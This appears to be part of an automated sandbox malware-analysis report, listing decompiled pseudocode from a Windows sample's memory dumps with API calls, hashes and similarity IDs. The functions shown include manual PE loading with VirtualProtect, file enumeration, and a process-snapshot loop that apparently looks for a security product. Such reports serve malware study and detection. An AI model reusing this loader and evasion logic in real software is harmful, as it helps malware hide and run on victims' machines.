                                                                                                                                                                                                                                          				if(_t17 != 0) {
                                                                                                                                                                                                                                          					_t28 = 8;
                                                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_t33 = _v8;
                                                                                                                                                                                                                                          					_t28 = E00401CE4( &_v8, _t33, _t34);
                                                                                                                                                                                                                                          					if(_t28 == 0) {
                                                                                                                                                                                                                                          						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                                                                                                                                                                                                                          						_t28 = E004015C2(_t33, _t37);
                                                                                                                                                                                                                                          						if(_t28 == 0) {
                                                                                                                                                                                                                                          							_t25 = E00401EB4(_t37, _t33);
                                                                                                                                                                                                                                          							_t28 = _t25;
                                                                                                                                                                                                                                          							if(_t28 == 0) {
                                                                                                                                                                                                                                          								_push(_t25);
                                                                                                                                                                                                                                          								_push(1);
                                                                                                                                                                                                                                          								_push(_t33);
                                                                                                                                                                                                                                          								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
                                                                                                                                                                                                                                          									_t28 = GetLastError();
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t35 = _v12;
                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
                                                                                                                                                                                                                                          					E00401938(_t35);
                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                          					return _t28;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                          0x00401ae4
                                                                                                                                                                                                                                          0x00401b01
                                                                                                                                                                                                                                          0x00401b08
                                                                                                                                                                                                                                          0x00401b67
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00401b0a
                                                                                                                                                                                                                                          0x00401b0a
                                                                                                                                                                                                                                          0x00401b14
                                                                                                                                                                                                                                          0x00401b18
                                                                                                                                                                                                                                          0x00401b1d
                                                                                                                                                                                                                                          0x00401b26
                                                                                                                                                                                                                                          0x00401b2a
                                                                                                                                                                                                                                          0x00401b2f
                                                                                                                                                                                                                                          0x00401b34
                                                                                                                                                                                                                                          0x00401b38
                                                                                                                                                                                                                                          0x00401b3d
                                                                                                                                                                                                                                          0x00401b3e
                                                                                                                                                                                                                                          0x00401b42
                                                                                                                                                                                                                                          0x00401b47
                                                                                                                                                                                                                                          0x00401b4f
                                                                                                                                                                                                                                          0x00401b4f
                                                                                                                                                                                                                                          0x00401b47
                                                                                                                                                                                                                                          0x00401b38
                                                                                                                                                                                                                                          0x00401b2a
                                                                                                                                                                                                                                          0x00401b51
                                                                                                                                                                                                                                          0x00401b5a
                                                                                                                                                                                                                                          0x00401b5e
                                                                                                                                                                                                                                          0x00401b68
                                                                                                                                                                                                                                          0x00401b6e
                                                                                                                                                                                                                                          0x00401b6e

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00401F61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00401B06,?,?,?,?,00000002,?,0040178F), ref: 00401F86
                                                                                                                                                                                                                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00401FA8
                                                                                                                                                                                                                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00401FBE
                                                                                                                                                                                                                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00401FD4
                                                                                                                                                                                                                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00401FEA
                                                                                                                                                                                                                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00402000
                                                                                                                                                                                                                                            • Part of subcall function 00401CE4: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,00401B14,?,?,?,?,?,?,00000002), ref: 00401D1B
                                                                                                                                                                                                                                            • Part of subcall function 00401CE4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00401D50
                                                                                                                                                                                                                                            • Part of subcall function 004015C2: LoadLibraryA.KERNEL32 ref: 004015F8
                                                                                                                                                                                                                                            • Part of subcall function 004015C2: lstrlenA.KERNEL32 ref: 0040160E
                                                                                                                                                                                                                                            • Part of subcall function 004015C2: memset.NTDLL ref: 00401618
                                                                                                                                                                                                                                            • Part of subcall function 004015C2: GetProcAddress.KERNEL32(?,00000002), ref: 0040167B
                                                                                                                                                                                                                                            • Part of subcall function 004015C2: lstrlenA.KERNEL32(-00000002), ref: 00401690
                                                                                                                                                                                                                                            • Part of subcall function 004015C2: memset.NTDLL ref: 0040169A
                                                                                                                                                                                                                                            • Part of subcall function 00401EB4: VirtualProtect.KERNEL32(00000000,?,00000004,?,?,?,00000000,?,?), ref: 00401EE2
                                                                                                                                                                                                                                            • Part of subcall function 00401EB4: VirtualProtect.KERNEL32(00000000,00000000,00000004,?), ref: 00401F3A
                                                                                                                                                                                                                                            • Part of subcall function 00401EB4: GetLastError.KERNEL32 ref: 00401F40
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0040178F), ref: 00401B49
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 33504255-0
                                                                                                                                                                                                                                          • Opcode ID: b6f527419930b44f40a1ab1d95bac96fd40d74d3357100ee3652cfdc2a43ac8f
                                                                                                                                                                                                                                          • Instruction ID: 2ecac3e89fcf864c5ff4a590cc22b0cc7a05ea2076188f05a12d7ce61af00ae2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6f527419930b44f40a1ab1d95bac96fd40d74d3357100ee3652cfdc2a43ac8f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24118A726007116BD7216BA98C85EAB77BCAF54314B00013AF906F7391EB78FD0587A8
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                                          			E01129347(void* __ecx, signed char* _a4) {
                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                                          				signed short _t11;
                                                                                                                                                                                                                                          				signed int _t12;
                                                                                                                                                                                                                                          				signed int _t14;
                                                                                                                                                                                                                                          				intOrPtr _t15;
                                                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                                                          				signed short* _t22;
                                                                                                                                                                                                                                          				void* _t24;
                                                                                                                                                                                                                                          				intOrPtr* _t27;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t24 = 0;
                                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                                          				_t19 = 1;
                                                                                                                                                                                                                                          				_t27 = 0x112d330;
                                                                                                                                                                                                                                          				E0112684E();
                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                          					_t8 = E011232BA(_a4,  &_v8); // executed
                                                                                                                                                                                                                                          					if(_t8 == 0) {
                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_push(_v8);
                                                                                                                                                                                                                                          					_t14 = 0xd;
                                                                                                                                                                                                                                          					_t15 = E0112A5E9(_t14);
                                                                                                                                                                                                                                          					if(_t15 == 0) {
                                                                                                                                                                                                                                          						HeapFree( *0x112d238, 0, _v8);
                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						 *_t27 = _t15;
                                                                                                                                                                                                                                          						_t27 = _t27 + 4;
                                                                                                                                                                                                                                          						_t24 = _t24 + 1;
                                                                                                                                                                                                                                          						if(_t24 < 3) {
                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                                                          					E0112684E();
                                                                                                                                                                                                                                          					if(_t19 != 0) {
                                                                                                                                                                                                                                          						_t22 =  *0x112d338; // 0x5649b58
                                                                                                                                                                                                                                          						_t11 =  *_t22 & 0x0000ffff;
                                                                                                                                                                                                                                          						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                                                                                                                                                                          							_t12 = _t11 & 0x0000ffff;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						 *_t22 = _t12;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					return _t19;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t19 = 0;
                                                                                                                                                                                                                                          				goto L7;
                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                          0x0112934f
                                                                                                                                                                                                                                          0x01129353
                                                                                                                                                                                                                                          0x01129354
                                                                                                                                                                                                                                          0x01129355
                                                                                                                                                                                                                                          0x0112935a
                                                                                                                                                                                                                                          0x0112935f
                                                                                                                                                                                                                                          0x01129366
                                                                                                                                                                                                                                          0x0112936d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112936f
                                                                                                                                                                                                                                          0x01129374
                                                                                                                                                                                                                                          0x01129375
                                                                                                                                                                                                                                          0x0112937c
                                                                                                                                                                                                                                          0x01129396
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112937e
                                                                                                                                                                                                                                          0x0112937e
                                                                                                                                                                                                                                          0x01129380
                                                                                                                                                                                                                                          0x01129383
                                                                                                                                                                                                                                          0x01129387
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129389
                                                                                                                                                                                                                                          0x01129387
                                                                                                                                                                                                                                          0x0112939e
                                                                                                                                                                                                                                          0x0112939e
                                                                                                                                                                                                                                          0x011293a0
                                                                                                                                                                                                                                          0x011293a7
                                                                                                                                                                                                                                          0x011293a9
                                                                                                                                                                                                                                          0x011293af
                                                                                                                                                                                                                                          0x011293b6
                                                                                                                                                                                                                                          0x011293c6
                                                                                                                                                                                                                                          0x011293be
                                                                                                                                                                                                                                          0x011293c1
                                                                                                                                                                                                                                          0x011293c1
                                                                                                                                                                                                                                          0x011293c9
                                                                                                                                                                                                                                          0x011293c9
                                                                                                                                                                                                                                          0x011293d2
                                                                                                                                                                                                                                          0x011293d2
                                                                                                                                                                                                                                          0x0112939c
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0112684E: GetProcAddress.KERNEL32(36776F57,0112935F), ref: 01126869
                                                                                                                                                                                                                                            • Part of subcall function 011232BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 011232E5
                                                                                                                                                                                                                                            • Part of subcall function 011232BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 01123307
                                                                                                                                                                                                                                            • Part of subcall function 011232BA: memset.NTDLL ref: 01123321
                                                                                                                                                                                                                                            • Part of subcall function 011232BA: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0112335F
                                                                                                                                                                                                                                            • Part of subcall function 011232BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01123373
                                                                                                                                                                                                                                            • Part of subcall function 011232BA: CloseHandle.KERNEL32(00000000), ref: 0112338A
                                                                                                                                                                                                                                            • Part of subcall function 011232BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 01123396
                                                                                                                                                                                                                                            • Part of subcall function 011232BA: lstrcat.KERNEL32(?,642E2A5C), ref: 011233D7
                                                                                                                                                                                                                                            • Part of subcall function 011232BA: FindFirstFileA.KERNELBASE(?,?), ref: 011233ED
                                                                                                                                                                                                                                            • Part of subcall function 0112A5E9: lstrlen.KERNEL32(?,00000000,0112D330,00000001,0112937A,0112D00C,0112D00C,00000000,00000005,00000000,00000000,?,?,?,0112207E,?), ref: 0112A5F2
                                                                                                                                                                                                                                            • Part of subcall function 0112A5E9: mbstowcs.NTDLL ref: 0112A619
                                                                                                                                                                                                                                            • Part of subcall function 0112A5E9: memset.NTDLL ref: 0112A62B
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0112D00C,0112D00C,0112D00C,00000000,00000005,00000000,00000000,?,?,?,0112207E,?,0112D00C,?,?), ref: 01129396
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileHeap$Allocatememset$AddressCloseCreateFindFirstFreeHandleProcTimelstrcatlstrlenmbstowcs
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 172136534-0
                                                                                                                                                                                                                                          • Opcode ID: f8b784878be387ce1f8992a009d569a32e51eb1e586d66ec619e70c453672df1
                                                                                                                                                                                                                                          • Instruction ID: 961393f384922e068feb37abb54907e4e4b5db9f18b8711e0f04cabae1394695
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8b784878be387ce1f8992a009d569a32e51eb1e586d66ec619e70c453672df1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16012175204239AAF71C5FFFDD40B7A7695EB4526CF142035FA44C61D0D7608CB19355
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E01121B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                          					_t15 = E01127BA9(_a4, _a8, _a12, __edi); // executed
                                                                                                                                                                                                                                          					_t26 = _t15;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_t26 = E011274B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                                                                                                                                                                                                          					if(_t26 == 0) {
                                                                                                                                                                                                                                          						_t23 = _a8 >> 1;
                                                                                                                                                                                                                                          						if(_t23 == 0) {
                                                                                                                                                                                                                                          							_t26 = 2;
                                                                                                                                                                                                                                          							HeapFree( *0x112d238, 0, _a12);
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t21 = _a12;
                                                                                                                                                                                                                                          							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                                                                                                                                                                                                                                          							 *__edi = _t21;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t26;
                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                          0x01121b1b
                                                                                                                                                                                                                                          0x01121b72
                                                                                                                                                                                                                                          0x01121b77
                                                                                                                                                                                                                                          0x01121b1d
                                                                                                                                                                                                                                          0x01121b37
                                                                                                                                                                                                                                          0x01121b3b
                                                                                                                                                                                                                                          0x01121b40
                                                                                                                                                                                                                                          0x01121b42
                                                                                                                                                                                                                                          0x01121b54
                                                                                                                                                                                                                                          0x01121b60
                                                                                                                                                                                                                                          0x01121b44
                                                                                                                                                                                                                                          0x01121b44
                                                                                                                                                                                                                                          0x01121b49
                                                                                                                                                                                                                                          0x01121b4e
                                                                                                                                                                                                                                          0x01121b4e
                                                                                                                                                                                                                                          0x01121b42
                                                                                                                                                                                                                                          0x01121b3b
                                                                                                                                                                                                                                          0x01121b7d

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,0112690C,?,004F0053,05649388,00000000,?), ref: 01121B60
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                          • Opcode ID: a2d10528dab8492599cdfa65f38283defb7eba4b6ec83a1a6d289ad43ea62527
                                                                                                                                                                                                                                          • Instruction ID: 24a2a2656cae8fcc0ee70e6d161f071fe52e4e15fa7e883ad4f755a7293d8585
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2d10528dab8492599cdfa65f38283defb7eba4b6ec83a1a6d289ad43ea62527
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52018632100269FBCF2ADF94DC01FAA3B79FF58360F058425FA199A160E7308970DB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                                                                          			E0112A872(intOrPtr* __edi) {
                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                          				intOrPtr _t15;
                                                                                                                                                                                                                                          				intOrPtr* _t21;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t21 = __edi;
                                                                                                                                                                                                                                          				_push( &_v12);
                                                                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                                                                          				_v8 = 0x1d4c0;
                                                                                                                                                                                                                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                          					_v16 = _t15;
                                                                                                                                                                                                                                          					Sleep(0x1f4); // executed
                                                                                                                                                                                                                                          					if(_v12 == 4) {
                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_v8 == 0) {
                                                                                                                                                                                                                                          						L4:
                                                                                                                                                                                                                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						if(_v8 <= 0x1f4) {
                                                                                                                                                                                                                                          							_v16 = 0x80004004;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_v8 = _v8 - 0x1f4;
                                                                                                                                                                                                                                          							goto L4;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                          					return _v16;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				goto L8;
                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                          0x0112a872
                                                                                                                                                                                                                                          0x0112a87f
                                                                                                                                                                                                                                          0x0112a880
                                                                                                                                                                                                                                          0x0112a881
                                                                                                                                                                                                                                          0x0112a888
                                                                                                                                                                                                                                          0x0112a8b6
                                                                                                                                                                                                                                          0x0112a8b7
                                                                                                                                                                                                                                          0x0112a8ba
                                                                                                                                                                                                                                          0x0112a8c0
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a89f
                                                                                                                                                                                                                                          0x0112a8a9
                                                                                                                                                                                                                                          0x0112a8b0
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a8a1
                                                                                                                                                                                                                                          0x0112a8a4
                                                                                                                                                                                                                                          0x0112a8c4
                                                                                                                                                                                                                                          0x0112a8a6
                                                                                                                                                                                                                                          0x0112a8a6
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a8a6
                                                                                                                                                                                                                                          0x0112a8a4
                                                                                                                                                                                                                                          0x0112a8cb
                                                                                                                                                                                                                                          0x0112a8d1
                                                                                                                                                                                                                                          0x0112a8d1
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 0112A8BA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                                          • Opcode ID: 5cacc733517c9ebae2f0cc06edd80e8c240a5af357bebf206b4dbd705264666e
                                                                                                                                                                                                                                          • Instruction ID: 7a2f21d047c11c58d53cdf8723918a791f613731dbfa81f5c20a8e26cd93a2c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cacc733517c9ebae2f0cc06edd80e8c240a5af357bebf206b4dbd705264666e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF04975C01228EFDB18DBD8D488AEDB7B8EF04305F1084AAE602A3241D3B46B95CF56
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E011260CF(void* __edx, void* __edi, void* _a4) {
                                                                                                                                                                                                                                          				int _t7;
                                                                                                                                                                                                                                          				int _t13;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t7 = E01127A28(__edx, __edi, _a4,  &_a4); // executed
                                                                                                                                                                                                                                          				_t13 = _t7;
                                                                                                                                                                                                                                          				if(_t13 != 0) {
                                                                                                                                                                                                                                          					memcpy(__edi, _a4, _t13);
                                                                                                                                                                                                                                          					 *((char*)(__edi + _t13)) = 0;
                                                                                                                                                                                                                                          					E0112147E(_a4);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t13;
                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                          0x011260db
                                                                                                                                                                                                                                          0x011260e0
                                                                                                                                                                                                                                          0x011260e4
                                                                                                                                                                                                                                          0x011260eb
                                                                                                                                                                                                                                          0x011260f6
                                                                                                                                                                                                                                          0x011260fa
                                                                                                                                                                                                                                          0x011260fa
                                                                                                                                                                                                                                          0x01126103

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 01127A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 01127A5E
                                                                                                                                                                                                                                            • Part of subcall function 01127A28: memset.NTDLL ref: 01127AD3
                                                                                                                                                                                                                                            • Part of subcall function 01127A28: memset.NTDLL ref: 01127AE7
                                                                                                                                                                                                                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,01129F9F,?,?,01129C62,00000002,?,?,?), ref: 011260EB
                                                                                                                                                                                                                                            • Part of subcall function 0112147E: HeapFree.KERNEL32(00000000,00000000,01121D11,00000000,?,?,-00000008), ref: 0112148A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset$FreeHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3053036209-0
                                                                                                                                                                                                                                          • Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                                                                                                                                                                                                                          • Instruction ID: 8233827a6dec607c63f43981c2ed3cba7d7c740d8a482e8bf49d6ca503a6e342
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74E08C7250013A77CB262A98DC00DEF7F6C8F666A1F044020FE089A205EB25CA20A3E1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                          			E011256A2() {
                                                                                                                                                                                                                                          				char _v264;
                                                                                                                                                                                                                                          				void* _v300;
                                                                                                                                                                                                                                          				int _t8;
                                                                                                                                                                                                                                          				intOrPtr _t9;
                                                                                                                                                                                                                                          				int _t15;
                                                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t15 = 0;
                                                                                                                                                                                                                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                                                          				if(_t17 != 0) {
                                                                                                                                                                                                                                          					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                                                                                                                          					while(_t8 != 0) {
                                                                                                                                                                                                                                          						_t9 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          						_t2 = _t9 + 0x112ee38; // 0x73617661
                                                                                                                                                                                                                                          						_push( &_v264);
                                                                                                                                                                                                                                          						if( *0x112d0fc() != 0) {
                                                                                                                                                                                                                                          							_t15 = 1;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						L7:
                                                                                                                                                                                                                                          						CloseHandle(_t17);
                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					goto L7;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				L8:
                                                                                                                                                                                                                                          				return _t15;
                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                          0x011256ad
                                                                                                                                                                                                                                          0x011256b7
                                                                                                                                                                                                                                          0x011256bb
                                                                                                                                                                                                                                          0x011256c5
                                                                                                                                                                                                                                          0x011256f6
                                                                                                                                                                                                                                          0x011256cc
                                                                                                                                                                                                                                          0x011256d1
                                                                                                                                                                                                                                          0x011256de
                                                                                                                                                                                                                                          0x011256e7
                                                                                                                                                                                                                                          0x011256fe
                                                                                                                                                                                                                                          0x011256e9
                                                                                                                                                                                                                                          0x011256f1
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x011256f1
                                                                                                                                                                                                                                          0x011256ff
                                                                                                                                                                                                                                          0x01125700
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01125700
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x011256fa
                                                                                                                                                                                                                                          0x01125706
                                                                                                                                                                                                                                          0x0112570b

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011256B2
                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 011256C5
                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,?), ref: 011256F1
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 01125700
                                                                                                                                                                                                                                          Memory Dump Source
